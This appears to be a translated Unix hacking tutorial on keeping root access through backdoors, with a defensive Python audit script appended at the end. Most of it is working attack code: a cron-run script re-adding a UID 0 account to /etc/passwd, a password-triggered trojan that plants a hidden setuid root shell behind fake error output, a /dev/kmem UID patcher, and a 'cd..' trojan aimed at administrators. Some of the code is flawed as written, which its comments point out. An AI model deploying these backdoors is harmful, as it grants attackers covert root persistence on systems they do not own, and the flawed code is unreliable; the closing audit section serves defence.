The crontab program is very useful to system administrators: the cron service runs scheduled jobs at a given minute, hour, day, month and day of the week. Used cleverly, it can also run a "backdoor" for us: cron can start the backdoor program early every morning, so that you can get into the system, do what you want, and leave again before the administrator is around. The root user's crontab file is /var/spool/crontab/root. Its format is as follows:
(1) (2) (3) (4) (5) (6)
0   0   *   *   3   /usr/bin/updatedb
1. Minute (0-60)
2. Hour (0-23)
3. Day of month (1-31)
4. Month (1-12)
5. Day of week (1-7)
6. Program to run
The example entry above runs /usr/bin/updatedb at midnight every Wednesday. To create a backdoor with cron, you only need to add the backdoor program to /var/spool/crontab/root. For example, the following entry runs a program every day at midnight that checks whether the user account it added to /etc/passwd is still there. The program itself follows the entry:
0 0 * * * /usr/bin/retract
<++> backdoor/backdoor.sh
#!/bin/csh
# Re-insert the UID 0 account if it has disappeared from /etc/passwd.
# Note: the check greps for "eviluser" but the line added is "Meb", so as
# written on the page the entry is appended on every run.
set evilflag = (`grep eviluser /etc/passwd`)
if ($#evilflag == 0) then
    set linecount = `wc -l /etc/passwd`
    cd
    cp /etc/passwd ./temppass
    # halve the line count so the new entry lands in the middle of the file
    @ linecount[1] /= 2
    @ linecount[1] += 1
    split -$linecount[1] ./temppass
    # entry as given on the page (six fields; a well-formed passwd line has seven)
    echo "Meb:0:0:Meb:/root:/bin/sh" >> ./xaa
    cat ./xab >> ./xaa
    mv ./xaa /etc/passwd
    chmod 644 /etc/passwd
    rm ./xa* ./temppass
    echo Done...
else
endif
<-->
[Comprehensive]
Of course, we can also write a trojan program and put it in the /bin directory; when it is run with a specific command-line argument it creates a setuid root shell. The following is an example program:
<++> backdoor/backdoor3.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define pass "triad"
#define BUFFERSIZE 6

int main(int argc, char *argv[])
{
    int i = 0;

    if (argv[1]) {
        if (!(strcmp(pass, argv[1]))) {
            /* copy the shell to a hidden dot-file and make it setuid root;
               chmod is repeated because chown clears the setuid bit */
            system("cp /bin/csh /bin/.swp121");
            system("chmod 4755 /bin/.swp121");
            system("chown root /bin/.swp121");
            system("chmod 4755 /bin/.swp121");
        }
    }
    /* fake error output so the program looks like a harmless failing utility */
    printf("372f: Invalid control argument, unable to initialize. Retrying");
    for (; i < 10; i++) {
        fprintf(stderr, ".");
        sleep(1);
    }
    printf("\nAction aborted after 10 attempts.\n");
    return (0);
}
<-->
[Variant]
The following program finds the user page of the running process in kernel memory (/dev/kmem), changes its real UID and GID to 0 and then executes a shell, so that you have a suid root shell.
<++> backdoor/kmemthief.c
/* The header names were lost in extraction; these are the ones the code needs.
   struct user with u_ruid/u_rgid/u_procp comes from the old BSD <sys/user.h>. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/user.h>
#define pass "triad"

struct user userpage;
/* address() must return the kernel address of this process's user page;
   its definition is not included on the page. */
long address(), userlocation;

int main(int argc, char *argv[], char *envp[])
{
    int count, fd;
    long where;

    if (argv[1]) {
        if (!(strcmp(pass, argv[1]))) {
            /* needs write access to kernel memory */
            fd = open("/dev/kmem", O_RDWR);
            if (fd < 0) {
                printf("Cannot read or write /dev/kmem\n");
                perror(argv[0]);
                exit(10);
            }
            userlocation = address();
            where = lseek(fd, userlocation, 0);
            if (where != userlocation) {
                printf("Cannot seek to user page\n");
                perror(argv[0]);
                exit(20);
            }
            count = read(fd, &userpage, sizeof(struct user));
            if (count != sizeof(struct user)) {
                printf("Cannot read user page\n");
                perror(argv[0]);
                exit(30);
            }
            printf("Current UID: %d\n", userpage.u_ruid);
            printf("Current GID: %d\n", userpage.u_rgid);
            /* patch the real UID/GID to root in the local copy */
            userpage.u_ruid = 0;
            userpage.u_rgid = 0;
            where = lseek(fd, userlocation, 0);
            if (where != userlocation) {
                printf("Cannot seek to user page\n");
                perror(argv[0]);
                exit(40);
            }
            /* write the copy back, up to (not including) u_procp */
            write(fd, &userpage, (char *)&(userpage.u_procp) - (char *)&userpage);
            execle("/bin/csh", "/bin/csh", "-i", (char *)0, envp);
        }
    }
    return 0;
}
<-->
["Stupid" method]
Have you ever typed "cd.." instead of "cd .." on a UNIX system? That is a habit from MS Windows and MS-DOS. Will the administrator make the same mistake? If so, can he make a "contribution" for us? :) For example, when he types "cd..", our trojan program is run. That way we do not even have to log on to the system to activate the trojan. The following is an example program:
<++> backdoor/dumb.c
/*
   This program appends a UID 0 account to /etc/passwd when the administrator
   accidentally types cd.. and, at the same time, is meant to perform the cd..
   so that the administrator notices nothing.
*/
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    FILE *fd;

    fd = fopen("/etc/passwd", "a+");
    if (fd == NULL)          /* fails unless run with write access to /etc/passwd */
        return 1;
    /* entry as given on the page (five fields; a well-formed passwd line has seven) */
    fprintf(fd, "hax0r:0:0:/root:/bin/sh\n");
    fclose(fd);
    /* as on the page; note that a cd in a child shell cannot change the
       working directory of the caller's shell */
    system("cd ");
    return 0;
}
<-->
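As an added example (not part of the original text), here is a defender-side audit in Python that looks for the traces the backdoors on this page leave behind: an extra UID 0 account or a malformed line in /etc/passwd (backdoor.sh, dumb.c), a root crontab entry whose command is not on an allow-list (the /usr/bin/retract entry), and a setuid file that is not on an allow-list (/bin/.swp121 from backdoor3.c). The sample passwd text, crontab text and file entries are constructed, and the allow-lists are placeholders an administrator would fill from a known-good system.

```python
import stat

# Constructed sample data for offline testing; not taken from a real host.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
meb:x:0:0:meb:/root:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hax0r:0:0:/root:/bin/sh
"""
SAMPLE_ROOT_CRONTAB = """# m h dom mon dow command
0 0 * * 3 /usr/bin/updatedb
0 0 * * * /usr/bin/retract
15 4 * * * /usr/sbin/logrotate /etc/logrotate.conf
"""
SAMPLE_SETUID = [  # (path, st_mode) as os.lstat() would report them
    ("/usr/bin/passwd", stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/bin/.swp121", stat.S_IFREG | stat.S_ISUID | 0o755),
]
KNOWN_CRON_COMMANDS = {"/usr/bin/updatedb", "/usr/sbin/logrotate"}  # placeholder allow-list
KNOWN_SETUID = {"/usr/bin/passwd"}                                   # placeholder allow-list

def audit_passwd(text):
    """Flag non-root UID 0 accounts and lines lacking the seven passwd fields."""
    findings = []
    for line in filter(None, text.splitlines()):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("malformed-passwd-line", line))
        elif fields[2] == "0" and fields[0] != "root":
            findings.append(("extra-uid0-account", fields[0]))
    return findings

def audit_crontab(text, allowed):
    """Flag crontab entries whose command is not on the admin's allow-list."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)  # five time fields, then the command
        if len(parts) < 6:
            findings.append(("malformed-cron-line", line))
        elif parts[5].split()[0] not in allowed:
            findings.append(("unlisted-cron-command", parts[5]))
    return findings

def audit_setuid(entries, allowed):
    """Flag setuid/setgid regular files that are not on the allow-list."""
    return [("unlisted-setuid-file", path) for path, mode in entries
            if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID)
            and path not in allowed]
```

On a live system the same functions can be fed the real /etc/passwd, the output of `crontab -l` for root, and `(path, os.lstat(path).st_mode)` pairs from a walk over the system bin directories.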